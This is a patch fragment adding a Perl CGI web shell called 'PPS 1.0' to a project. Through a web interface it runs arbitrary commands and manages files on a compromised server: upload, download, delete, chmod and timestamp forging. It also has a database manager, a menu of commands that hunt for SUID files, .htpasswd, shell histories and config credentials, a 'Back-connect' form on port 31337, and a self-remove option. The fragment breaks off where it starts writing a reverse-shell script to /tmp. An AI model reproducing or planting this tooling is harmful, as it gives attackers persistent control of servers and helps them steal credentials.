+sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list) {$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if (-d $arg){print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form method=POST name='.$ii.' action='.$ScriptLocation.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="cd '.$arg.'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.' ]</b></font></a></form></td><td>dir</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1 = (stat $arg)[7]/1024;if ($size1<1000){$size = sprintf("%.2f",($size1))." KB";}else{$size = sprintf("%.2f",($size1/1024))." MB";}print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form name='.$ii.' method=post action='.$ScriptLocation.'><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.'</font></a></form></td><td>'.$size.'</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post action='.$ScriptLocation.'><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table></td></tr>';
+}}print "</table>";sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);if (!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}sub mtime($){my ($seconds, $minutes, $hours, $day, $month, $year, $wday, $yday,$isdst) = localtime((stat($_[0]))[9]);my $mmtime = ($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if (-d $file && $file ne $dir.'/.'){push @dirs,$file;}if (-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if (-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|[<]|g;$st=~s|>|[>]|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|\[<\]|<|g;$st=~s|\[>\]|>|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if ($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;
+$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
+<html><head><title>PPS 1.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333; }a{ text-decoration:none; }a:hover{ text-decoration:underline; }.ml1{ border:1px solid#444;padding:5px;margin:0;overflow: auto; }.bigarea{ width:100%;height:250px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }#toolsTbl{ text-align:center; }.toolsInp{ width: 300px }.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Cwd:</span></td><td><nobr>
+END
+P("".`$uname`. "");print "</nobr><br>";P("". `$idd` . "");print "<br>";PH("".`$hddall`. "");print " GB <span>Free: </span>";PH("".`$hddfree`. "");print " GB [ ";P("". `$hddproc`);print "% ]";$time=localtime;print "<br>$time<table><td>";my $cwd="";
+my @path = split("/", $CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777); my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST action='.$ScriptLocation.' name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST action='.$ScriptLocation.' name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print "</table>";sub cwdcol{if (!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td></table>";
+print <<END;
+</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr></table><table width="100%" colspan="1" bgcolor="#222"><td><form method="POST" name=systeminfo action=$ScriptLocation><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><form method=POST name=files action=$ScriptLocation><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler action=$ScriptLocation><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout action=$ScriptLocation><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove action=$ScriptLocation><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td></table></tr></table><font color="#C0C0C0" size="2">
+END
+}
+sub PrintLoginForm{print <<END;
+<form name="f" method="POST" action="$ScriptLocation" align="center"><input type="password" name="p"><input type="submit" value="Enter"></form>
+END
+}
+sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id, $val) = split(/=/, $cookie);$Cookies{$id} = $val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;	&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";
+dir_list();sub wr_cur {if (!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writeable]</font>';}}
+print <<END;
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST action=$ScriptLocation><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST action="$ScriptLocation"><span>Make dir:</span>
+END
+wr_cur();
+print <<END;
+<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST action="$ScriptLocation"><span>Make file:</span>
+END
+wr_cur();
+print <<END;
+<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST" action="$ScriptLocation"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+<td>
+END
+&PrintFileUploadForm;
+print <<END;
+</td></table>
+END
+}
+sub PrintFileUploadForm{
+print <<END;
+<span>Upload file: </span>
+END
+wr_cur();
+print <<END;
+<br><form name="upload_file_form" enctype="multipart/form-data" method="POST" action="$ScriptLocation"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form>
+END
+}
+sub ConsoleP{
+print <<END;
+<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table class=info id=toolsTbl cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text class=toolsInp name=c value=''><input type=submit value=">>"></form></td></tr><tr><tr><td><form name="alias" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit value='>>'></form></td></tr></table></td></table>
+END
+}
+sub RTP{my $path=$CurrentDir."/".$TransferFile;print "Path: $path";$Fdata = dec($Fdata);
+print <<END;
+<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=rename_file><input type=hidden name=path value=$path><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value='RENAME'></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=touch_file><input type=hidden name=path value=$path><input type=text size=20 name=touch_file value="$Fdata"><input type=submit value='TOUCH '></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=$path><input type=hidden name=c value=chmod_file><input type=submit value='CHMOD '></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="view_file"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='VIEW'></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='EDIT'></form></td></tr></table></td></table>
+END
+}
+sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";RTP();&PrintPageFooter;}
+sub Console{&PrintPageHeader;print "<h1>Console:</h1>";P("". `$idd` . "");ConsoleP();&PrintPageFooter;}
+sub CommandTimeout{if(!$WinNT){alarm(0);
+print <<END;
+</xmp>Command exceeded maximum time of $CommandTimeoutDuration second(s).<br>Killed it!
+END
+ConsoleP();exit;}}
+sub file_header {
+ print <<END;
+ <h1>File manager</h1><table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>
+END
+}
+sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/){$CurrentDir=~s!\Q//!/!g;$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);	while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;
+if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand = "tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand = "touch -t $ttempt $path";}if($RunCommand =~ m/^\s*cd\s+(.+)/){$OldDir = $CurrentDir;$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir = `$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'} = \&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{	print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintDownloadLinkPage{local($FileUrl) = @_;if(-e $FileUrl){$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";&PrintPageHeader("c");file_header();
+print <<END;
+<code><font size=1>Download File $TransferFile...</font><br></code>
+END
+&PrintCommandLineInputForm;&PrintPageFooter;}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $FileUrl: $!</code>";&PrintFileDownloadForm;&PrintPageFooter;}}sub SendFileToBrowser{local($SendFile) = @_;if(open(SENDFILE, $SendFile)){if($WinNT){binmode(SENDFILE);binmode(STDOUT);}$FileSize = (stat($SendFile))[7];($Filename = $SendFile) =~  m!([^/^\\]*)$!;print "Content-Type: application/x-unknown\n";print "Content-Length: $FileSize\n";print "Content-Disposition: attachment; filename=$1\n\n";print while(<SENDFILE>);close(SENDFILE);}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $SendFile: $!</code>";&PrintCommandLineInputForm;&PrintFileDownloadForm;&PrintPageFooter;}}sub BeginDownload{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile = $TransferFile;}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){&SendFileToBrowser($TargetFile);}else{	&PrintDownloadLinkPage($TargetFile);}}sub SystemInfo{sub langs {$s = "which gcc;which perl;which python;which php;which tar;which zip";$s.=" -U $q{u}" if($q{u}); return $s;}sub hdd {$s = "df -h";$s.=" -U $q{u}" if($q{u});return $s;}sub perlv {$s = "perl -v";$s.=" -U $q{u}" if($q{u});return $s;}sub hosts {$s = "cat /etc/hosts";$s.=" -U $q{u}" if($q{u});return $s;}sub downloaders {$s = "which lynx;which links;which wget;which GET;which fetch;which curl";$s.=" -U $q{u}" if($q{u});return $s;}sub httpd {$s = "locate httpd.conf";$s.=" -U $q{u}" if($q{u});return $s;}$langs = langs();$httpd = httpd();$hdd = hdd();$perlv = perlv();$hosts = hosts();$downloaders = downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print '<font face="Verdana" size="1">';print "<b>Paths:</b>";P("<pre><font color='#E6DED8'>". `$langs`. "</font></pre>");print "<b>Downloaders:</b>";P("<pre><font color='#E6DED8'>". `$downloaders`. "</font></pre>");print "<b>httpd.conf:</b>";P("<pre><font color='#E6DED8'>". `$httpd`. "</font></pre>");print "<b>HDD:</b>";P("<pre><font color='#E6DED8'>". `$hdd`. "</font></pre>");print "<b>Perl version:</b>";P("<pre><font color='#E6DED8'>". `$perlv`. "</font></pre>");print "<b>/etc/hosts:</b>";P("<pre><font color='#E6DED8'>". `$hosts`. "</font></pre>");print '</font>';&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if (!$hhost){$hhost='localhost'};if (!$pport){$pport='3306'};if (!$usser){$usser='root'};
+print <<END;
+<form name='sf' method='post' action="$ScriptLocation"><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql' >PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr></table></form><br><script>document.getElementById('nname').focus();</script>
+END
+}
+sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{
+ print <<END;
+<form name='querys' method='post' action="$ScriptLocation"><textarea name='query' style='width:100%;height:60px'></textarea><br/>
+<input type=submit value='Query'>  <input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form>
+END
+}
+sub sql_cq_form {
+print <<END;
+<table><td><span>Get data from columns:</span></td><td><form name='cquerys' method='post' action="$ScriptLocation"><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query">
+  <input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td></table>
+END
+}
+sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].' action="'.$ScriptLocation.'">';print '<input type="hidden" name="a" value="sql_databases">';print "<input type=hidden name=database value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
+sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_tables">';print "<input type=hidden name=table value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
+sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if (f.checked){var cn=document.getElementById("cquery").value;if (cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script>';print '<tr><form method=post name=cc'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_columns">';print '<input type=hidden name=column value='.$$ref[0].'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td>';print "</form><tr>";}
+sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print "<td><font face='Verdana' size='1'>[$s4et] </font></td><td><font face='Verdana' size='1'>$$ref[0]</font></td>";print "</form></tr>";}
+sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}
+sub NetForm {$rip = $ENV{'REMOTE_ADDR'};
+print <<END;
+<h1>Back-connect  [perl]</h1><br/><form name='nfp' method=post action=$ScriptLocation>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form><br>
+END
+}
+sub back{open(FILE,">/tmp/bbc.pl");$bbc = '#!/usr/bin/perl
